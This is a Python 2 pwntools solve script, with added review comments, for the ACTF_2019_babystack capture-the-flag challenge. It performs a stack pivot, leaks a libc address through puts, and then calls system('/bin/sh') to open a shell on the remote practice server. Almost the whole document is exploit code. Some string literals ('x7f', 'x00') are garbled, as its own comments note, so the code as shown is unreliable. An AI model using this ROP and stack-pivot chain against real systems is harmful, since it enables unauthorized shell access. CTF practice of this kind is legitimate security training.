exp
简单栈迁移
# Walkthrough of the ACTF_2019_babystack solve script (pwntools, written for
# Python 2: `print hex(...)` statement syntax and generator `.next()`).
# Two rounds are played against the same service: round 1 leaks the runtime
# address of puts() from the GOT, round 2 reuses that leak.  Comments below
# describe only what the visible lines do; frame layout and gadget contents
# are not visible here and are marked as assumptions.
from pwn import *
#context.log_level = 'debug'
# Target is the public practice instance named on the page; the two commented
# lines are the local alternatives the author used while developing.
io = remote('node3.buuoj.cn',27019)
#io = process('./ACTF_2019_babystack')
#io = process('./idaidg/linux_server64')
# Symbol tables: PLT/GOT entries are read from the challenge binary, libc
# offsets from the bundled libc-2.27.so.  The arithmetic further down only
# holds if the remote runs that exact libc build.
elf = ELF('./ACTF_2019_babystack')
libc = ELF('./libc/libc-2.27.so')
# Raw addresses inside the binary.  They can only be meaningful if the binary
# is loaded at a fixed address (no PIE) -- presumably the case here.  The names
# are the author's; nothing in this file verifies that e.g. 0x400ad3 really is
# a `pop rdi; ret` gadget -- confirm with a disassembler before trusting them.
pop_rdi = 0x400ad3
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
start = 0x4008f6
leave = 0x400a18
ret = 0x400a4f
# Round 1.  The service asks for a message length and then announces where the
# message will be stored.  224 equals the length of the payload built below
# (0xd0 bytes of padding + two 8-byte values).
io.recvuntil("How many bytes of your message?")
io.sendline('224')
io.recvuntil("Your message will be saved at ")
# Keeps the first 14 characters of the reply -- assumes the service prints the
# address as "0x" followed by 12 hex digits; any other format makes int() raise
# ValueError.
addr = io.recv()[:14]
addr = int(addr,16)
print hex(addr)
# Payload layout: 8 filler bytes, then a chain that calls puts(puts_got) and
# returns to `start`, padded with 'a' up to 0xd0, then the buffer address and
# the `leave` address.  NOTE(review): presumably those last two qwords overwrite
# the saved rbp and the return address of the vulnerable frame so that the
# function's own `leave; ret` moves the stack into the announced buffer (the
# page title calls this 栈迁移, "stack migration") -- the frame layout that
# would confirm the 0xd0 offset is not visible in this file.
payload = 'a'* 8
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(start)
payload = payload.ljust(0xd0,'a')
payload += p64(addr)
payload += p64(leave)
io.send(payload)
# Leak parsing.  NOTE(review): as transcribed, the delimiter is the three ASCII
# characters 'x7f', not the single byte 0x7f, so recvuntil() would wait for a
# literal "x7f" in the output; the backslash of an escape sequence appears to
# have been lost when the page was extracted.  The same applies to 'x00' on the
# next line, which is additionally a 3-character fill argument -- str.ljust()
# requires exactly one character and raises TypeError for it.  Verify both
# literals against the upstream copy rather than this listing.
puts_addr = io.recvuntil('x7f')[-6:]
puts_addr = puts_addr.ljust(8,'x00')
print hex(u64(puts_addr))
# libc base = leaked puts() address minus puts()'s offset in the bundled libc;
# system() and a "/bin/sh" string are then located relative to that base.
# `.search(...).next()` is the Python 2 generator protocol (`next(...)` in 3).
libcbase = u64(puts_addr) - libc.symbols['puts']
system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search('/bin/sh').next()
# Round 2: identical handshake; the buffer address is re-read because the
# service may hand out a different one this time.
io.recvuntil("How many bytes of your message?")
io.sendline('224')
io.recvuntil("Your message will be saved at ")
addr = io.recv()[:14]
addr = int(addr,16)
print hex(addr)
# Second payload: an extra `ret` precedes the chain (presumably to re-align the
# stack before system() is entered under this libc -- not verifiable here),
# then pop rdi / "/bin/sh" / system, with the same two-qword tail as round 1.
payload = 'a'* 8
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
payload = payload.ljust(0xd0,'a')
payload += p64(addr)
payload += p64(leave)
# sendline() here versus send() in round 1: this appends a newline, so 225
# bytes go over the wire against the announced 224.  Whether the extra byte is
# harmless depends on how the service reads the message, which is not visible.
io.sendline(payload)
# Hands the connection to the user; nothing after this point is automated.
io.interactive()